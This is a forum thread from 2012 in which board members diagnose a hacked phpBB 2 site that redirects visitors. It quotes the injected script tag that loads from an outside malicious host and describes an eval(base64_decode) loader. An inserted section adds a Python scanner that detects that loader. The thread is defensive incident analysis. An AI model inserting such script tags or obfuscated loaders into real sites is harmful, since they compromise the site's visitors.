
Posted: Thu Mar 01, 2012 14:43 +0000
by Mayhem
Pinging up the index.php source in IE8 (yes, it tried to redirect when I used that browser) reveals this at the bottom of the code:

<script src="http://sbulle06tsconti.rr.nu/nl.php?p=d"></script>

Googling that URL pulls up just one hit online for a compromise at Dreamhost:

http://community.mybb.com/thread-114345.html

Which then leads to this thread:

http://discussion.dreamhost.com/thread-134262.html

Is the Usagi Dojo on Dreamhost? If so, it might explain something. The HTACCESS file might need looking at as well.

Posted: Thu Mar 01, 2012 15:35 +0000
by Stormhaven
I ran into something similar a while back on a domain I was running. I'm guessing the phpBB that the dojoboard is running is probably a few revs behind. There have been quite a few security exploits with the older versions. I had to have the host provider run a grep to find all the files with the domain inserts and manually repair them.

Posted: Thu Mar 01, 2012 15:44 +0000
by Todd Shogun
I use Firefox and no problems....I will see what I can do!

And yes, Dreamhost does host us

Posted: Thu Mar 01, 2012 16:23 +0000
by Todd Shogun
Ugh...it looks messy. This will be time-consuming. Any phpBB-savvy Members out there willing to help?

Posted: Thu Mar 01, 2012 22:11 +0000
by maichan
Wow, sounds serious. Hope you can get it fixed Todd!

@Stormhaven - on your advice I'm on Firefox now without any problems.
My home computer info:
Internet Explorer 9.0.8112.16421 - redirects
Firefox 10.0.2 - Does not redirect

Posted: Fri Mar 02, 2012 7:57 +0000
by Stan Sakai
I heard from Thomas. He has tried getting to the Dojo, but was redirected every time. I gave him the tip about using Firefox. Hopefully, that will work for him.

I've been redirected a couple of times, but not to the extent that others on this board have experienced. I use a Mac computer and Safari.

Posted: Fri Mar 02, 2012 8:16 +0000
by Mayhem
It does appear to be only IE, and perhaps Safari, affected. My brother and I tried different versions of IE and Firefox, and no Firefox version got redirected. All the IE browsers did.

Posted: Fri Mar 02, 2012 8:43 +0000
by Stormhaven
Todd, I don't know PHP but when I had to deal with this, I just manually removed the bits from the HTML. If you just need help doing that, feel free to contact me.

Posted: Sun Mar 04, 2012 14:19 +0000
by digulla
I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).

The board itself is still vulnerable so it's just a question of time until it happens again.

Edit: The virus made two changes:

1. There was a file .log/log1.txt which contains the list of sites to redirect to.

2. At the start of each .php file, there was code like this: <?php /**/ eval(base64_decode("...."))

I'm not sure what this code did; my guess is that it kept the file above up to date, plus it probably injected the code for the redirection into the HTML.

I kept the files just in case we want to analyze this further.
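
The two changes described in the post above can be checked for across a web root with a short scanner. This is an added example, not part of the original post or the board's code; the function names, the constructed sample tree and its placeholder payload are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# Loader shape quoted in the post: <?php /**/ eval(base64_decode("....")) at the very start.
INJECTED_PREFIX = re.compile(rb'\A(?:\xef\xbb\xbf)?\s*<\?php\s*/\*\*/\s*eval\s*\(\s*base64_decode\s*\(')
DROPPED_FILE = ".log/log1.txt"  # redirect-target list named in the post


def scan_webroot(root):
    """Return sorted (relative path, finding) pairs for files matching the post's description."""
    root = Path(root)
    findings = []
    if (root / DROPPED_FILE).is_file():
        findings.append((DROPPED_FILE, "dropped-redirect-list"))
    for path in root.rglob("*.php"):
        if not path.is_file():
            continue
        with path.open("rb") as fh:
            head = fh.read(4096)  # the prefix sits at offset 0, so the head is enough
        if INJECTED_PREFIX.match(head):
            findings.append((path.relative_to(root).as_posix(), "injected-eval-prefix"))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample web root: one infected file, two clean ones, one dropped list."""
    root = Path(root)
    (root / "includes").mkdir(parents=True)
    (root / ".log").mkdir()
    (root / "index.php").write_bytes(
        b'<?php /**/ eval(base64_decode("Y29uc3RydWN0ZWQ=")); ?><?php\ninclude "common.php";\n')
    (root / "viewtopic.php").write_bytes(b'<?php\ninclude "common.php";\n')
    # Legitimate base64_decode use away from offset 0 must not be flagged.
    (root / "includes" / "functions.php").write_bytes(
        b'<?php\nfunction unpack_cookie($c) { return base64_decode($c); }\n')
    (root / ".log" / "log1.txt").write_text("placeholder.example\n")
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel_path, finding in scan_webroot(build_sample_tree(tmp)):
            print(f"{finding:24} {rel_path}")
```

A clean scan only means this one loader shape is absent; it says nothing about how the files were modified in the first place.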

Posted: Sun Mar 04, 2012 14:23 +0000
by Mayhem
Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.

Posted: Sun Mar 04, 2012 14:29 +0000
by digulla
Mayhem wrote: Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.


Yes. I just never had the time to make the update.

Posted: Sun Mar 04, 2012 14:39 +0000
by digulla

Posted: Tue Mar 06, 2012 17:27 +0000
by toine
digulla wrote: I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).

The board itself is still vulnerable so it's just a question of time until it happens again.


I just have been redirected... :?

(Chrome under Ubuntu 11.10)

Me, too....

Posted: Tue Mar 06, 2012 17:33 +0000
by go
Dear Readers,
I just got redirected using Firefox.
Best wishes to all!
go

Posted: Tue Mar 06, 2012 21:35 +0000
by Mayhem
Hmmm, somewhat worrying, but no redirect here for me.